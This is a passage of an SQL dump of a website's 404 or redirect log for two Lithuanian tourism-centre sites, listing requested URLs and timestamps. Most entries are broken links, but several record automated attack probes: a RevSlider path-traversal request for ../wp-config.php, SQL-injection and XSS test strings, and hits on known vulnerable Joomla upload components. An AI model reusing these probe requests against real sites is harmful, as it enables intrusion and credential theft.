00:00:00'),(1297,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','','',1,0,'2014-11-13 04:45:00','0000-00-00 00:00:00'),(1298,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/pasiulymai','','','',1,0,'2014-11-13 04:45:01','0000-00-00 00:00:00'),(1299,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija','','','',1,0,'2014-11-13 04:45:02','0000-00-00 00:00:00'),(1300,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/apgyvendinimas','','','',1,0,'2014-11-13 04:45:04','0000-00-00 00:00:00'),(1301,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-11-13 04:45:05','0000-00-00 00:00:00'),(1302,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2014-11-13 04:45:07','0000-00-00 00:00:00'),(1303,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/darbo-uzmokestis','','','',1,0,'2014-11-13 04:45:09','0000-00-00 00:00:00'),(1304,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/galerija','','','',1,0,'2014-11-13 04:45:10','0000-00-00 00:00:00'),(1305,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/edukacines-programos','','','',1,0,'2014-11-13 04:45:14','0000-00-00 00:00:00'),(1306,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/13-sample-data-article/demo/features/33-kava','','','',1,0,'2014-11-13 04:45:16','0000-00-00 00:00:00'),(1307,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/13-sample-data-article/demo/features/32-dviraciai','','','',1,0,'2014-11-13 04:45:17','0000-00-00 00:00:00'),(1308,'http://www.tytuvenai.eu/index.php/component/content/category/\"http://www.kraziai.lt\">www.kraziai.lt</a></p>','','','',1,0,'2014-11-13 04:45:19','0000-00-00 00:00:00'),(1309,'http://www.tytuvenai.eu/index.php/component/content/category/\"mailto:dubysosrp@raseiniai.lt\">dubysosrp@raseiniai.lt</a><br','','','',1,0,'2014-11-13 04:45:20','0000-00-00 00:00:00'),(1310,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos','','','',1,0,'2014-11-13 04:45:21','0000-00-00 00:00:00'),(1311,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/apie-centra/istatai','','','',1,0,'2014-11-13 04:45:23','0000-00-00 00:00:00'),(1312,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/gido-paslaugos','','','',1,0,'2014-11-13 04:45:24','0000-00-00 00:00:00'),(1313,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2014-11-13 04:45:25','0000-00-00 00:00:00'),(1314,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2014-11-13 04:45:27','0000-00-00 00:00:00'),(1315,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2014-11-13 04:45:28','0000-00-00 00:00:00'),(1316,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/suvenyrai','','','',1,0,'2014-11-13 04:45:29','0000-00-00 00:00:00'),(1317,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=57:skelbimas-muziejaus-vadovo-s-pareigoms-uimti&catid=1:paskutinesnaujienos&Itemid=53','','','',6,0,'2014-11-18 13:14:18','0000-00-00 00:00:00'),(1318,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&showall=1','','','',2,0,'2014-11-23 06:15:40','0000-00-00 00:00:00'),(1319,'http://www.tytuvenai.eu/index.php/component/content?Itemid=82&id=103','','','',6,0,'2014-11-26 18:58:32','0000-00-00 00:00:00'),(1320,'http://tytuvenai.eu//index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2014-11-26 20:46:11','0000-00-00 00:00:00'),(1321,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=58:muziejaus-atidarymas&catid=44:renginiai','','','',2,0,'2014-11-27 06:53:05','0000-00-00 00:00:00'),(1322,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=12','','','',1,0,'2014-12-06 13:18:28','0000-00-00 00:00:00'),(1323,'http://www.tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',3,0,'2014-12-07 03:58:27','0000-00-00 00:00:00'),(1324,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&141209-235304','','','',1,0,'2014-12-09 22:52:56','0000-00-00 00:00:00'),(1325,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&141209-235304','','','',1,0,'2014-12-09 22:52:56','0000-00-00 00:00:00'),(1326,'http://tytuvenai.eu/index.php?141209-235305','','','',1,0,'2014-12-09 22:52:57','0000-00-00 00:00:00'),(1327,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&141209-235305','','','',1,0,'2014-12-09 22:52:57','0000-00-00 00:00:00'),(1328,'http://infotytuvenai.lt//index.php','','','',6,0,'2014-12-10 16:33:31','0000-00-00 00:00:00'),(1329,'http://infotytuvenai.lt/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2486,0,'2014-12-10 16:33:40','0000-00-00 00:00:00'),(1330,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=50&Itemid=37','','','',2,0,'2015-01-09 23:31:06','0000-00-00 00:00:00'),(1331,'http://tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',1,0,'2015-01-11 02:09:34','0000-00-00 00:00:00'),(1332,'http://tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager','','','',1,0,'2015-01-11 02:09:34','0000-00-00 00:00:00'),(1333,'http://tytuvenai.eu/index.php?option=com_user&view=user&task=edit','','http://tytuvenai.eu/index.php/component/users/?task=user.login','',6,0,'2015-01-11 22:45:08','0000-00-00 00:00:00'),(1334,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_n.png','','','',1,0,'2015-01-12 11:59:13','0000-00-00 00:00:00'),(1335,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-01-12 11:59:13','0000-00-00 00:00:00'),(1336,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_e.png','','','',1,0,'2015-01-12 11:59:14','0000-00-00 00:00:00'),(1337,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_se.png','','','',1,0,'2015-01-12 11:59:14','0000-00-00 00:00:00'),(1338,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_s.png','','','',1,0,'2015-01-12 11:59:14','0000-00-00 00:00:00'),(1339,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-01-12 11:59:15','0000-00-00 00:00:00'),(1340,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_w.png','','','',1,0,'2015-01-12 11:59:15','0000-00-00 00:00:00'),(1341,'http://www.tytuvenai.eu./index.php/apgyvendinimas/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-01-12 11:59:15','0000-00-00 00:00:00'),(1342,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-01-18 11:53:10','0000-00-00 00:00:00'),(1343,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=56','','','',1,0,'2015-01-18 12:53:57','0000-00-00 00:00:00'),(1344,'http://www.tytuvenai.eu/index.php/turizmo-informacija/undefined','','http://www.tytuvenai.eu/index.php/turizmo-informacija/gido-paslaugos','',1,0,'2015-01-29 20:15:45','0000-00-00 00:00:00'),(1345,'http://www.tytuvenai.eu/index.php/apie-centra/undefined','','http://www.tytuvenai.eu/index.php/apie-centra/ekskursijos','',1,0,'2015-01-29 20:16:08','0000-00-00 00:00:00'),(1346,'http://www.infotytuvenai.lt/index.php/component/content?id=103&Itemid=82','','','',1,0,'2015-02-04 11:06:55','0000-00-00 00:00:00'),(1347,'http://www.tytuvenai.eu/index.php?option=com_userlist','','','',1,0,'2015-02-08 09:22:03','0000-00-00 00:00:00'),(1348,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=92:tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai&tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-09 15:43:27','0000-00-00 00:00:00'),(1349,'http://www.infotytuvenai.lt/index.php/component/content?Itemid=82&id=103','','','',4,0,'2015-02-18 15:11:19','0000-00-00 00:00:00'),(1350,'http://www.tytuvenai.eu/index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2015-03-10 16:53:04','0000-00-00 00:00:00'),(1351,'http://www.tytuvenai.eu/index.php/13-sample-data-article/demo/features/31-renginiaihttps://www.facebook.com/tapytojassarkauskas/posts/1581485548762269?pnref=story','','','',1,0,'2015-03-23 14:17:11','0000-00-00 00:00:00'),(1352,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/galerija','','','',1,0,'2015-03-26 12:21:34','0000-00-00 00:00:00'),(1353,'http://www.tytuvenai.eu/index.php?option=7065','','','',1,0,'2015-03-30 19:29:49','0000-00-00 00:00:00'),(1354,'http://www.tytuvenai.eu/index.php?option=1915','','','',1,0,'2015-03-30 19:29:50','0000-00-00 00:00:00'),(1355,'http://www.tytuvenai.eu/index.php?option=com_content(),)..\"\'(,','','','',1,0,'2015-03-30 19:29:51','0000-00-00 00:00:00'),(1356,'http://www.tytuvenai.eu/index.php?option=com_content\'AwWd<\'\">Ompd','','','',1,0,'2015-03-30 19:29:52','0000-00-00 00:00:00'),(1357,'http://www.tytuvenai.eu/index.php?option=8946','','','',1,0,'2015-03-31 07:50:44','0000-00-00 00:00:00'),(1358,'http://www.tytuvenai.eu/index.php?option=6585','','','',1,0,'2015-03-31 07:50:44','0000-00-00 00:00:00'),(1359,'http://www.tytuvenai.eu/index.php?option=com_content\'XFOx<\'\">YpxT','','','',1,0,'2015-03-31 07:50:47','0000-00-00 00:00:00'),(1360,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=64:pasaulins-turizmo-dienos-minjimas-kelms-rajone&tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-04 23:48:50','0000-00-00 00:00:00'),(1361,'http://www.tytuvenai.eu/index.php/turiztmo-informacija/dubysos-regioninis-parkas','','http://www.tytuvenai.eu/','',1,0,'2015-04-10 06:45:33','0000-00-00 00:00:00'),(1362,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=46:pasirasyta-sutartis&catid=34:naujienos&Itemid=34','','','',3,0,'2015-04-13 05:46:34','0000-00-00 00:00:00'),(1363,'http://www.tytuvenai.eu/index.php/t','','http://www.tytuvenai.eu/index.php/turizmo-informacija','',1,0,'2015-04-13 08:26:19','0000-00-00 00:00:00'),(1364,'http://www.tytuvenai.eu/index.php/turizmo-inforothi','','http://www.tytuvenai.eu/index.php/turizmo-informacija/aktyvus-poilsis','',1,0,'2015-04-13 08:26:22','0000-00-00 00:00:00'),(1365,'http://www.tytuvenai.eu/index.php/apie-ass=','','http://www.tytuvenai.eu/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','',1,0,'2015-04-13 08:26:25','0000-00-00 00:00:00'),(1366,'http://www.tytuvenai.eu/index.php/turizmo-inform_f4dd','','http://www.tytuvenai.eu/index.php/kontaktai','',1,0,'2015-04-13 08:26:26','0000-00-00 00:00:00'),(1367,'http://www.tytuvenai.eu/index.php/apie-centra/e','','http://www.tytuvenai.eu/index.php/44-paskutinesnaujienos/224-paminetas-lietuvos-valstybes-gimtadienis','',1,0,'2015-04-13 08:26:27','0000-00-00 00:00:00'),(1368,'http://www.tytuvenai.eu/index.php/apie-centra/paslktaiaugos','','http://www.tytuvenai.eu/index.php/44-paskutinesnaujienos/229-tapybos-parodos-atidarymas-ir-edukacines-programos-piligrimu-gira-pristatymas','',1,0,'2015-04-13 08:26:27','0000-00-00 00:00:00'),(1369,'http://www.tytuvenai.eu/index.php/','','http://www.tytuvenai.eu/index.php/turizmo-informacija','',1,0,'2015-04-13 12:47:25','0000-00-00 00:00:00'),(1370,'http://www.tytuvenai.eu/index.php/apie-centra/p','','http://www.tytuvenai.eu/index.php/apie-centra/suvenyrai','',1,0,'2015-04-13 12:47:25','0000-00-00 00:00:00'),(1371,'http://www.tytuvenai.eu/index.php/apie-','','http://www.tytuvenai.eu/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','',1,0,'2015-04-13 12:47:29','0000-00-00 00:00:00'),(1372,'http://www.tytuvenai.eu/index.php/turizmo-informaci','','http://www.tytuvenai.eu/index.php/projektai/ii-etapas-baznycios-restauravimas','',1,0,'2015-04-13 12:47:31','0000-00-00 00:00:00'),(1373,'http://www.tytuvenai.eu/index.php/turizmo-informacij','','http://www.tytuvenai.eu/index.php/projektai/i-etapas-baznycios-restauravimas','',1,0,'2015-04-13 12:47:32','0000-00-00 00:00:00'),(1374,'http://www.tytuvenai.eu/index.php/apie-centra/pasl','','http://www.tytuvenai.eu/index.php/44-paskutinesnaujienos/229-tapybos-parodos-atidarymas-ir-edukacines-programos-piligrimu-gira-pristatymas','',1,0,'2015-04-13 12:47:33','0000-00-00 00:00:00'),(1375,'http://www.tytuvenai.eu/index.php/ltainXN','','http://www.tytuvenai.eu/index.php/44-paskutinesnaujienos/227-poezijos-skaitymai-tytuvenuose','',1,0,'2015-04-13 12:47:33','0000-00-00 00:00:00'),(1376,'http://www.tytuvenai.eu/index.php/apie-cebloc','','http://www.tytuvenai.eu/index.php/lankytini-objektai/','',1,0,'2015-04-13 13:59:50','0000-00-00 00:00:00'),(1377,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_n.png','','','',1,0,'2015-04-15 12:29:00','0000-00-00 00:00:00'),(1378,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-04-15 12:29:00','0000-00-00 00:00:00'),(1379,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_e.png','','','',1,0,'2015-04-15 12:29:01','0000-00-00 00:00:00'),(1380,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_se.png','','','',1,0,'2015-04-15 12:29:01','0000-00-00 00:00:00'),(1381,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_s.png','','','',1,0,'2015-04-15 12:29:02','0000-00-00 00:00:00'),(1382,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-04-15 12:29:02','0000-00-00 00:00:00'),(1383,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_w.png','','','',1,0,'2015-04-15 12:29:03','0000-00-00 00:00:00'),(1384,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-04-15 12:29:03','0000-00-00 00:00:00'),(1385,'http://www.tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=56:veriniu-pasaulis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=37','','','',1,0,'2015-04-17 11:35:38','0000-00-00 00:00:00'),(1386,'http://infotytuvenai.lt/index.php/component/content//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',2,0,'2015-04-20 13:42:06','0000-00-00 00:00:00'),(1387,'http://infotytuvenai.lt/index.php/component/content//wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php','','','',1,0,'2015-04-20 13:42:06','0000-00-00 00:00:00'),(1388,'http://www.tytuvenai.eu///index.php/kontaktai','','','',1,0,'2015-05-06 17:40:11','0000-00-00 00:00:00'),(1389,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=40:what-is-the-difference-between-archiving-and-trashing-an-article','','','',1,0,'2015-05-18 19:14:16','0000-00-00 00:00:00'),(1390,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=36:where-did-the-installer-go','','','',1,0,'2015-05-18 19:26:26','0000-00-00 00:00:00'),(1391,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=46:apiecentra&catid=35:naujienos&Itemid=61','','','',1,0,'2015-05-19 06:25:46','0000-00-00 00:00:00'),(1392,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=39:how-do-i-remove-an-article','','','',1,0,'2015-05-20 20:21:37','0000-00-00 00:00:00'),(1393,'http://www.tytuvenai.eu/index.php?view=article&catid=31:general&id=35%3','','','',1,0,'2015-05-27 04:24:08','0000-00-00 00:00:00'),(1394,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=57:skelbimas-vyr-finansininks-pareigoms-uimti&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2015-05-27 04:28:09','0000-00-00 00:00:00'),(1395,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=50:kaledu-gele&catid=32:turizmas&Itemid=37','','','',1,0,'2015-05-27 15:55:58','0000-00-00 00:00:00'),(1396,'http://tytuvenai.eu/index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2015-05-30 12:15:38','0000-00-00 00:00:00'),(1397,'http://www.tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=55..','','','',2,0,'2015-06-20 14:28:39','0000-00-00 00:00:00'),(1398,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=46:apiecentra&catid=35:naujienos&Itemid=53','','','',2,0,'2015-06-20 16:19:01','0000-00-00 00:00:00'),(1399,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_n.png','','','',1,0,'2015-06-23 14:07:36','0000-00-00 00:00:00'),(1400,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-06-23 14:07:36','0000-00-00 00:00:00'),(1401,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_e.png','','','',1,0,'2015-06-23 14:07:36','0000-00-00 00:00:00'),(1402,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_se.png','','','',1,0,'2015-06-23 14:07:37','0000-00-00 00:00:00'),(1403,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_s.png','','','',1,0,'2015-06-23 14:07:37','0000-00-00 00:00:00'),(1404,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-06-23 14:07:37','0000-00-00 00:00:00'),(1405,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_w.png','','','',1,0,'2015-06-23 14:07:38','0000-00-00 00:00:00'),(1406,'http://www.tytuvenai.eu/index.php/apie-centra/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-06-23 14:07:38','0000-00-00 00:00:00'),(1407,'http://tytuvenai.eu/index.php/component/user/?task=register','','http://tytuvenai.eu/index.php?option=com_user&view=register','',1,0,'2015-07-01 15:07:40','0000-00-00 00:00:00'),(1408,'http://www.tytuvenai.eu/index.php/component/user/?task=register','','http://www.tytuvenai.eu/index.php?option=com_user&view=register','',19,0,'2015-07-01 15:31:03','0000-00-00 00:00:00'),(1409,'http://www.tytuvenai.eu/index.php?option=com_easyblog&view=dashboard&layout=write','','http://www.tytuvenai.eu/','',2,0,'2015-07-07 17:16:16','0000-00-00 00:00:00'),(1410,'http://tytuvenai.eu//index.php?option=com_adsmanager&task=upload&tmpl=component&','','','',1,0,'2015-07-08 09:28:44','0000-00-00 00:00:00'),(1411,'http://www.tytuvenai.eu/index.php?option=-1\'&view=article&id=25&Itemid=48','','','',1,0,'2015-07-08 09:32:17','0000-00-00 00:00:00'),(1412,'http://www.tytuvenai.eu/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',4,0,'2015-07-08 21:29:33','0000-00-00 00:00:00'),(1413,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',18,0,'2015-07-08 22:59:23','0000-00-00 00:00:00'),(1414,'http://infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',19,0,'2015-07-11 00:45:28','0000-00-00 00:00:00'),(1415,'http://www.tytuvenai.eu//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',3,0,'2015-07-13 04:57:10','0000-00-00 00:00:00'),(1416,'http://www.tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',6,0,'2015-07-19 19:05:03','0000-00-00 00:00:00'),(1417,'http://tytuvenai.eu/index.php?option=com_myblog&task=ajaxupload','','','',5,0,'2015-07-20 21:18:43','0000-00-00 00:00:00'),(1418,'http://tytuvenai.eu/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',7,0,'2015-07-21 17:37:39','0000-00-00 00:00:00'),(1419,'http://tytuvenai.eu//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',2,0,'2015-07-22 00:29:55','0000-00-00 00:00:00'),(1420,'http://www.infotytuvenai.lt/index.php?option=com_user&view=register','','http://www.infotytuvenai.lt/index.php/component/users/?view=registration','',6,0,'2015-07-23 14:59:37','0000-00-00 00:00:00'),(1421,'http://www.infotytuvenai.lt/index.php/component/user/?task=register','','http://www.infotytuvenai.lt/index.php?option=com_user&view=register','',6,0,'2015-07-23 14:59:37','0000-00-00 00:00:00'),(1422,'http://tytuvenai.eu/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','','',5,0,'2015-07-23 19:09:22','0000-00-00 00:00:00'),(1423,'http://www.tytuvenai.eu/index.php?option=com_kide','','http://www.tytuvenai.eu','',1,0,'2015-07-25 05:36:37','0000-00-00 00:00:00'),(1424,'http://www.infotytuvenai.lt/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc','','','',2,0,'2015-07-30 09:15:56','0000-00-00 00:00:00'),(1425,'http://www.tytuvenai.eu/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc','','','',1,0,'2015-07-30 23:17:56','0000-00-00 00:00:00'),(1426,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_n.png','','','',1,0,'2015-07-31 20:06:47','0000-00-00 00:00:00'),(1427,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-07-31 20:06:47','0000-00-00 00:00:00'),(1428,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_e.png','','','',1,0,'2015-07-31 20:06:48','0000-00-00 00:00:00'),(1429,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_se.png','','','',1,0,'2015-07-31 20:06:48','0000-00-00 00:00:00'),(1430,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_s.png','','','',1,0,'2015-07-31 20:06:48','0000-00-00 00:00:00'),(1431,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-07-31 20:06:49','0000-00-00 00:00:00'),(1432,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_w.png','','','',1,0,'2015-07-31 20:06:49','0000-00-00 00:00:00'),(1433,'http://www.tytuvenai.eu./index.php/apie-centra/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-07-31 20:06:49','0000-00-00 00:00:00'),(1434,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_n.png','','','',1,0,'2015-07-31 20:08:34','0000-00-00 00:00:00'),(1435,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-07-31 20:08:34','0000-00-00 00:00:00'),(1436,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_e.png','','','',1,0,'2015-07-31 20:08:34','0000-00-00 00:00:00'),(1437,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_se.png','','','',1,0,'2015-07-31 20:08:35','0000-00-00 00:00:00'),(1438,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_s.png','','','',1,0,'2015-07-31 20:08:35','0000-00-00 00:00:00'),(1439,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-07-31 20:08:36','0000-00-00 00:00:00'),(1440,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_w.png','','','',1,0,'2015-07-31 20:08:36','0000-00-00 00:00:00'),(1441,'http://www.tytuvenai.eu./index.php/turizmo-informacija/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-07-31 20:08:36','0000-00-00 00:00:00'),(1442,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_n.png','','','',1,0,'2015-07-31 20:10:33','0000-00-00 00:00:00'),(1443,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-07-31 20:10:33','0000-00-00 00:00:00'),(1444,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_e.png','','','',1,0,'2015-07-31 20:10:33','0000-00-00 00:00:00'),(1445,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_se.png','','','',1,0,'2015-07-31 20:10:33','0000-00-00 00:00:00'),(1446,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_s.png','','','',1,0,'2015-07-31 20:10:34','0000-00-00 00:00:00'),(1447,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-07-31 20:10:34','0000-00-00 00:00:00'),(1448,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_w.png','','','',1,0,'2015-07-31 20:10:34','0000-00-00 00:00:00'),(1449,'http://www.tytuvenai.eu./index.php/lankytini-objektai/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-07-31 20:10:34','0000-00-00 00:00:00'),(1450,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_n.png','','','',1,0,'2015-07-31 20:10:40','0000-00-00 00:00:00'),(1451,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-07-31 20:10:40','0000-00-00 00:00:00'),(1452,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_e.png','','','',1,0,'2015-07-31 20:10:40','0000-00-00 00:00:00'),(1453,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_se.png','','','',1,0,'2015-07-31 20:10:41','0000-00-00 00:00:00'),(1454,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_s.png','','','',1,0,'2015-07-31 20:10:41','0000-00-00 00:00:00'),(1455,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-07-31 20:10:41','0000-00-00 00:00:00'),(1456,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_w.png','','','',1,0,'2015-07-31 20:10:42','0000-00-00 00:00:00'),(1457,'http://www.tytuvenai.eu./index.php/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-07-31 20:10:42','0000-00-00 00:00:00'),(1458,'http://www.infotytuvenai.lt/index.php/wp-login.php','','','',1,0,'2015-08-01 22:16:37','0000-00-00 00:00:00'),(1459,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',2,0,'2015-08-03 13:48:26','0000-00-00 00:00:00'),(1460,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',2,0,'2015-08-03 13:49:53','0000-00-00 00:00:00'),(1461,'http://www.infotytuvenai.lt/index.php/apgyvendinimas/administrator/index.php','','','',1,0,'2015-08-05 09:14:50','0000-00-00 00:00:00'),(1462,'http://infotytuvenai.lt/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',2368,0,'2015-08-06 03:47:03','0000-00-00 00:00:00'),(1463,'http://www.infotytuvenai.lt/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',64,0,'2015-08-06 03:56:14','0000-00-00 00:00:00'),(1464,'http://tytuvenai.eu//index.php?option=com_myblog&task=ajaxupload','','','',2,0,'2015-08-13 04:56:55','0000-00-00 